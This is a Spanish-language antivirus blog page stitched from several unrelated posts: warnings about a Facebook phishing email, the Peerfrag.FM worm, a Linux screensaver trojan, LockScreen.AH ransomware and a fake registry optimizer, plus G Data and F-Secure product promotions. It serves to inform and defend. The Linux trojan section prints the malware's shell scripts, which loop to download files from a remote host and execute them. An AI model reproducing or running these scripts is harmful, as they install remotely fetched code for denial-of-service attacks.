La apariencia del email es exactamente igual a la de cualquier otro de los mensajes de aviso de Facebook.

No corras el reisgo de pinchar. Si lo haces, se descargará un software espía que se dedica a robar datos personales y contraseñas. Ya circulan ‘mails’ alertando del riesgo. Si te llega, es importante que avises inmediatamente al emisor para que pase el antivirus y evitar que siga propagándose.

Posts relacionados

• Virus Koobface.C (1)
• Hackear facebook, un negocio muy rentable (0)
• Ataques a redes sociales (1)

¿Que hace el gusano Peerfrag.FM?

Las acciones que pueden realizarse en forma remota son las siguientes:

• Ataques DoS/DDoSv
• Descargar archivos
• Ejecutar archivos
• Escanear puertos
• Obtener información del equipo
• Robar contraseñas guardadas en Firefox
• Robar Credenciales y contraseñas

¿Como saber si se está infectado con el gusano Peerfrag.FM?

El gusano se conecta a través del UDP:1221 al dominio sub7.ahdjejgf.com

Además, el gusano Peerfrag.FM crea una serie de archivos en los dispositivos extraibles, así como en las carpetas de los siguientes programas:

• eMule
• eMule Plus
• Kazaa
• Ares Galaxy
• BearShare
• DC++
• iMesh
• LimeWire
• Shareaza

Crea los siguientes archivos en los dispositivos extraíbles conectados al sistema comprometido:

• %Unidad de Disco% \system32\wnzip32.exe
• %Unidad de Disco% \system32\Desktop.ini
• %Unidad de Disco% \autorun.inf

Además, crea la siguiente carpeta y los siguientes ficheros en el disco duro

• %Unidad en la que está instalada Windows% \RECYCLER\S-1-5-21-[valor aleatorio]\
• %Unidad en la que está instalada Windows% \RECYCLER\S-1-5-21-[valor aleatorio]\wnzip32.exe
• %Unidad en la que está instalada Windows% \RECYCLER\S-1-5-21-[valor aleatorio]\Desktop.ini

El gusano Peerfrag.FM crea, dentro del explorer, un hilo con su propio código.

Puede propagarse por Messenger enviando un enlace malicioso a todos los contactos del usuario comprometido.

Además, crea las siguientes claves en el registro

• Clave:  HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

• Clave: HKEY_LOCAL_MACHINE\software\classes\.key\

A los que les otorgan los siguientes valores (respectivamente)

• Valor: 'Taskman' = '[unidad]\S-1-5-21-[valor]\rundll32.exe'

• Valor:  'Shell' = 'explorer.exe,[unidad]\S-1-5-21-[valor]\rundll32.exe'

¿Cómo eliminar el Gusano Peerfrag.FM?

Intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.

En caso de que no funcione o no pueda restaurar el sistema:

1. Desactivar temporalmente la Restauración del Sistema.
2. Reiniciar el ordenador a Modo a Prueba de Fallos.
3. Con un antivirus actualizado, borre y ataque todos los archivos infectados.
4. Elimine los archivos explicados en ¿Como saber si está infectado?
5. En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.
6. Edite el registro y elimine los parámetros explicados en ¿Como saber si está infectado?
7. Eliminar archivos temporales
8. Reiniciar el ordenador

Posts relacionados

• Personal Antivirus (19)
• Eliminar Redlofs, Quitar el gusano Redlofs (0)
• Gusano Conficker.A (24)
• Win32/Gimmiv.A (0)
• Troyano Wow.VM o Trojan.W32: Como eliminarlo (1)
• Eliminar Exploit.TR, quitar Exploit.TR (0)
• Gusano Eggdrop.AA (0)
• Gusano Alcan (0)
• FakePowav.B (0)
• Como hacer el Windows Vista mas seguro en 10 pasos (0)

Solo en el caso de que haya instalado el fichero .deb en cuestión y solo en ese caso, abrir un terminal y ejecutar el siguiente comando:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

Este troyano accede al sistema cuando el usuario descarga e instala desde Gnome-Look lo que aparentemente es un salvapantallas con una imagen de una cascada.

Dentro del fichero .deb se encuentra un script con el siguiente código:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Al ser instalado, se descargan otros scripts que al ser ejecutados descargan nuevo código malicioso.

Por ejemplo, el contenido del fichero Auto.bash es el siguiente:

while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done

El objetivo final del troyano es hacer parte al PC infectado de un ataque de denegación de servicio distribuido (DDOS)

Nombre completo: Trojan.LINUX/Waterfall
Tipo: [Trojan] – Caballo de Troya: programa que parece beneficioso o útil pero resulta ser malicioso en algún momento. No se propaga por sí mismo.
Plataforma: [LINUX] – Linux

NOTA: El salvapantallas ha sido eliminado de la web de Gnome-Look.

NOTA: Los ficheros que el troyano descarga desde http://05748.t35.com ya no están disponibles.

Posts relacionados

• No Related Post

Posts relacionados

• No Related Post

El vurs hasta ahora sólo se ha presentado en Australia.

Rock Astley

Posts relacionados

• Mobile Spy: Virus para Iphone (0)

G-DATA: información general de seguridad así como descargas de prueba a sus productos.

G Data presenta su nueva gama de soluciones de seguridad 2010. Destacan por su eficacia en la protección frente a todo tipo de malware, la velocidad de análisis y su facilidad de uso. A los tradicionales G Data Antivirus, G Data InternetSecurity, G Data TotalCare y G Data Notebook Security se suma en esta ocasión G Data InternetSecurity para Netbooks, específicamente diseñado para proteger los cada vez más populares mini-portátiles.

Detección eficaz de virus y tiempos mínimos de análisis en G-Data

G-Data mantiene en funcionamiento paralelo dos motores de búsqueda de malware, además de sus tecnologías de de análisis Fingerprinting 2.o, lo que permite aumentar su velocidad con cada análisis, ya que el software de seguridad de G-Data aprende en cada escaneado. Este aumento paulatino de la velocidad de escaneado permite utilizar hasta un 80% menos de memoria RAM con respecto a versiones anteriores.

Las nuevas soluciones de G-Data se mantienen en segundo plano y permite concentrar la actividad del PC y sus recursos en tareas productivas.

Interfaz de “un sólo clic” de G-Data

Otra de las mejoras aplicadas en G-Data 2010 es su facilidad de uso, ya que integra la interfaz de “un sólo clic”, lo que da acceso a principiantes y profesionales a todas sus funcionalidades de forma sencilla. Las funciones importantes se muestran de un vistazo, fruto del estudio realizado entre los usuarios de las versiones anteriores, con lo que se ha conseguido un 42% menos de clics necesarios.

Productos de G-Data 2010

Se suma a la moda de ofrecer 3 suites de seguridad conjuntas para 3 PCs y mantiene su oferta de que, sin coste alguno, los usuarios de versiones anteriores de G-Data, podrán actualizar su licencia.

Nuestra gama 2010 incorpora métodos modernos y proactivos para conseguir la mayor tasa de detección de malware del mercado. Además, las tecnologías behaviour blocking, heurística o cloud security permiten detectar malware activo incluso antes de que las firmas antivirus lo hagan. Asimismo, la nueva interfaz permite tener todo a la vista con un simple click, gestionándose de forma automática las funciones de protección en segundo plano.

La gama 2010 de soluciones de seguridad de G Data para el mercado de consumo consta de las siguientes soluciones:

G Data AntiVirus 2010

El antivirus de G Data 2010, el que más comparativas ha ganado en la prensa especializada europea en los últimos años. Gracias a la tecnología fingerprinting y a las listas blancas, las comprobaciones innecesarias de archivos pertenecen al pasado consiguiendo escaneos completos del PC en tiempos sorprendentemente reducidos.

Versiones y precios: para 1 PC, 29,95€; para 3 PCs, 39,95€.

G Data InternetSecurity 2010

G DATA InternetSecurity 2010 no da oportunidad alguna a los cibercriminales y proporciona protección eficaz frente a los ataques de hackers, código malicioso y spam, a la vez que ofrece avanzados controles parentales. Su silencioso firewall es perfecto incluso para jugones, pues todas sus acciones se llevan a cabo de forma automática y sin interrumpir al usuario.

Versiones y precios: para 1 PC, 39,95€; para 3 PCs, 49,95€.

G Data InternetSecurity 2010 para Netbooks

La potente suite de seguridad para netbooks G-Data InternetSecurity 2010 protege de forma eficaz frente a todos los peligros procedentes de Internet, mediante protección antivirus, firewall y antispam. Su instalación no puede ser más sencilla: basta con insertar el stick USB con autoarranque en un puerto del netbook para que comience la instalación.

Versiones y precios: para 1 PC, 39,95€.

G Data TotalCare 2010

La solución G-Data Total Care 2010 (o todo en uno de G Data), es el abanderado de la gama 2010. Además de antivirus, cortafuegos, antispam, antiphising y control parental, incorpora función de copia de seguridad y optimizador de sistema. Para aquellos usuarios que busquen una protección total G Data TotalCare es la solución ideal.

Versiones y precios: para 1 PC, 49,95€; para 3 PCs, 59,95€

Fingerprinting 2.0

La tecnología de G-Data Fingerprinting 2.0 solo analiza los elementos modificados entre análisis y análisis, aumentando la velocidad y saltando el analisis de las llamadas listas blancas, que se van actualizando on-the-fly por el propio software.

Posts relacionados

• Listado de programas antivirus reales (1)
• Que es Alertvir (0)

Como saber si está infectado con el LockScreen.AH

Tu ordenador se bloquea y para desbloquearse te pide un código que has de pedir por SMS, un SMS premium de coste elevado.

En caso de que aparezcan en tu ordenador los siguientes ficheros:

• axjvk.exe
• csbto.exe
• iunmj.exe
• lpyyi.exe
• mpjwz.exe

Y en el registro de Windows las siguientes claves

• Clave: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• Valor: “windll” = “[ruta y nombre del archivo]“
• Clave: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• Valor: “windll” = “[ruta y nombre del archivo]“

Como eliminar y quitar el LockScreen.AH

Para eliminar el LockScreen.AH hay dos formas:

Primera forma de eliminar el LockScreen.AH

intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.

En caso de que no funcione o no pueda restaurar el sistema, para quitar el LockScreen.AH pruebe lo siguiente:

1. Desactivar temporalmente la Restauración del Sistema.
2. Reiniciar el ordenador a Modo a Prueba de Fallos.
3. Con un antivirus actualizado, borre y ataque todos los archivos infectados.
4. Elimine los archivos explicados en ¿Como saber si está infectado?
5. En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.
6. Edite el registro y elimine los parámetros explicados en ¿Como saber si está infectado?
7. Eliminar archivos temporales
8. Reiniciar el ordenador

Segunda forma de eliminar el LockScreen.AH

Eset ha creado un generador de claves, que permite el acceso al sistema. Para desbloquear el equipo, lo primer es ejecutar el programa descargado, para introducir el numero de 4 digitos que muestra la pantalla en el ordenador que está infectado. Pulsar Generate. Tras ello, el programa generará y mostrará un código que deberemos usar, introduciéndola en la ventana que bloquea al equipo infectado.

Necesitará habilitar el Intérprete de comandos y el editor de Registro.

1. Inicio y Ejecutar
2. Escribir en la venta que se abre la siguiente instrucción:
   reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f
3. Pulsar Aceptar

1. Inicio y Ejecutar
2. Escribir en la ventana, de nuevo, la siguiente instrucción: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableCMD /f
3. Pulsar Aceptar

Descargar el generador de clavesaqui

Posts relacionados

• Listado de programas antivirus reales (1)
• Descargar ESET Smart Security (1)

Registry Optimizer de Aido

Con una gran interfaz de usuario, donde hasta se puede ver un contrato de licencia (CLU) y una serie de premios que “ha recibido” el falso software, el Rogue Registry Optimizer de Aido que hacen que el usuario mas confiado “pique” y permita que el software se aloje en su equipo.

Como se propaga

Se propaga como casi todos los software maliciosos, o bien por unidades de red compartidas o por medio de dispositivos USB, haciendo una copia de si mismo en el directorio raíz del dispositivo, creando un fichero autorun.inf para reproducirse automáticamente en cuanto se enchufe el dispositivo.

Que es Registry Optimizer de Aido

Por su parte, Registry Optimizer es un nuevo ejemplar de los cada vez más comunes falsos antivirus. Recomendamos, una vez mas, que cada vez que se descargue algún antivirus se contraste la fuente con la lista de fabricantes de antivirus verdaderos, para evitar, en la medida de lo posible, errores en la descarga y que, en caso de ser un “antivirus de pago” (que existen) el creador del malware es capaz de robar los datos bancarios o tarjetas de crédito de los usuarios a la hora de realizar la transacción económica.

Registry Optimizer de Aido

En la imagen podeis ver que el Registry Optimizer, una vez instalado, lanza un supuesto análisis del PC, para mostrar una serie de amenazas (todas falsas, como no), crear un icono en el escritorio y abrirse cada vez que el ordenador se  reinicia, dando opción al usuario a registrar el producto a cambio del pago de la licencia, con lo que consigue, además, los datos bancarios como hemos dicho antes.

Como saber si se está infectado con el Registry Optimizer de Aido. ¿Como saber si tienes el Registry Optimizer?

En caso de que aparezcan en tu ordenador los siguientes ficheros:

• %Archivos de Programa%\Adio Registry Optimizer\DIORO.exe
• %Archivos de Programa%\Adio Registry Optimizer\UNINST.EXE

Y en el registro de Windows las siguientes claves

• Clave: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  Valor: Adio Registry Optimizer = C:\Archivos de programa\Adio Registry Optimizer\adioro.exe /s
  Mediante esta entrada, RegistryOptimizer consigue ejecutarse cada vez que Windows se inicia.
• Clave: : HKEY_CURRENT_USER\Software\Adio Registry Optimizer\adioro\UI
  Valor: Valor: Last Scan = %fecha y hora%
• Clave: HKEY_CURRENT_USER\Software\Adio Registry Optimizer\adioro\UI
  Valor: Last Scan Result = 4E, 00, 00, 00
• Clave: HKEY_CURRENT_USER\Software\Adio Registry Optimizer\adioro\UI
  Valor: Selected Modules = 01, 01, 01, 01, 01, 01, 01, 01, 01, 01, 01, 01, 01
• Clave: HKEY_LOCAL_MACHINE\SOFTWARE\Adio Registry Optimizer
  aid = 5
• Clave: HKEY_LOCAL_MACHINE\SOFTWARE\Adio Registry Optimizer
  Installdate = %fecha y hora%
• Clave: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ App Paths\ adioro.exe
  (Default) = C:\Archivos de programa\Adio Registry Optimizer\adioro.exe
• Clave: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall\ Adio Registry Optimizer
  Valor: DisplayIcon = C:\Archivos de programa\Adio Registry Optimizer\adioro.exe
• Clave: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall\ Adio Registry Optimizer
  Valor: DisplayName = Adio Registry Optimizer 1.5
• Clave: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall\ Adio Registry Optimizer
  Valor: DisplayVersion = 1.5
• Clave: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall\ Adio Registry Optimizer
  Valor: NSIS:StartMenuDir = Adio Registry Optimizer
• Clave: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall\ Adio Registry Optimizer
  Valor: Publisher = AdioSoft Inc
• Clave: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall\ Adio Registry Optimizer
  Valor: UninstallString = C:\Archivos de programa\Adio Registry Optimizer\uninst.exe
• Clave: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall\ Adio Registry Optimizer
  Valor: URLInfoAbout = hxxp://www.adioro.com

Como eliminar y quitar el Registry Optimizer de Aido

Para eliminar el Registry Optimizer de Aido intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.

En caso de que no funcione o no pueda restaurar el sistema, para quitar el Registry Optimizer de Aido pruebe lo siguiente:

1. Desactivar temporalmente la Restauración del Sistema.
2. Reiniciar el ordenador a Modo a Prueba de Fallos.
3. Con un antivirus actualizado, borre y ataque todos los archivos infectados.
4. Elimine los archivos explicados en ¿Como saber si está infectado?
5. En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.
6. Edite el registro y elimine los parámetros explicados en ¿Como saber si está infectado?
7. Eliminar archivos temporales
8. Reiniciar el ordenador

Como se propaga el Registry Optimizer de Aido

La propagación habitual de este tipo de aplicaciones fraudulentas se realiza a través de las redes para compartir archivos y los usuarios suelen descargarlos involuntariamente al estar bajo otro nombre o junto a contenidos deseados. Otra manera por la que puede propagarse es mediante páginas que anuncian las bondades del programa y permiten que el usuario lo descargue voluntariamente, pensando que es una muestra gratuita o de prueba y que va a resolver sus necesidades. En el caso de este programa fraudulento, la página mostraba incluso premios “otorgados” para mostrarse más creíble.

Fuente: Enciclopedia de Panda Security +

Posts relacionados

• Gusano Rekwoj: Como eliminarlo (0)
• Como evitar el phishing: 10 claves para impedir el phishing (2)

En este caso se trata del nuevo producto de F-Secure para el año 2010, el F-Secure Internet Security, suite completa de protección, sobre todo cuando estos están conectados a la red y hacen uso habitual de la web e internet, así como de sus programas de mensajería instantánea, frecuente entrada de virus y troyanos.

f-secure internet security 2010

F-Secure Internet Security 2010

El nuevo producto de F-Secure cuenta con:

• AntiSpyware: El antispyware se usa para evitar que usuarios maliciosos puedan hacerse con información personal de tu ordenador o de tus cuentas de internet a base de protección, en tiempo real, de descargas y gestión de amenazas en determinados sitios web.
• Antispam: Otro de los grandes “agujeros” de nuestro ordenador. Con el sistema de protección del email, del correo electrónico, nuestros emails estarán seguros y nos avisarán de posibles intentos de phishing en ellos.
• Control Parental: Cada vez mas, los sistemas de seguridad incluyen esta particularidad para la protección de los menores ante contenidos sensibles. En este caso, el control parental de F-Secure se especializa en la gestión de perfiles de usuarios.
• Anti malware: El malware, presente en muchas de las descargas gratuitas que se ofrecen en internet, es atacado con una de las aplicaciones del nuevo F-Secure 2010 ya que escanea on-the-fly cualquier programa sospechoso y nos alertará en caso de cualquier amenaza.

Requisitos recomendados para el F-Secure Internet Security 2010

• Microsoft® Windows® Vista o 7
• Procesador capaz de correr Microsoft Vista o Windows 7 en 32 bits y 64 bits.
• 512 MB de Ram
• 600 MB de disco duro

Requisitos mínimos del F-Secure Internet Security 2010

• Microsoft Windows XP o 2000
• Procesador Intel Pentium III a 600 Mhz
• 256 MB de RAM
• 600 MB de Disco duro

Posts relacionados

• Mobile Spy: Virus para Iphone (0)

Ver fuente (+)

Posts relacionados

• Que es Alertvir (0)
• G Data 2010 (1)
• LockScreen.AH. Virus que pide que envies un SMS para desbloquearlo (0)
• Kaspersky Internet Security 2010 y Kaspersky Antivirus 2010 (0)
• McAfee compra Solidcore Systems (0)
• Osiatis y Kaspersky, unidos bajo la seguridad (0)
• Descargar Antivirus Panda Gratis (0)
• Memoria flash Buffalo RUF2-HSCL-U con cifrado incorporado (0)
• Descargar ESET Smart Security (1)
• Tercera variante del Downandup/Conficker: W32 Downandup C (0)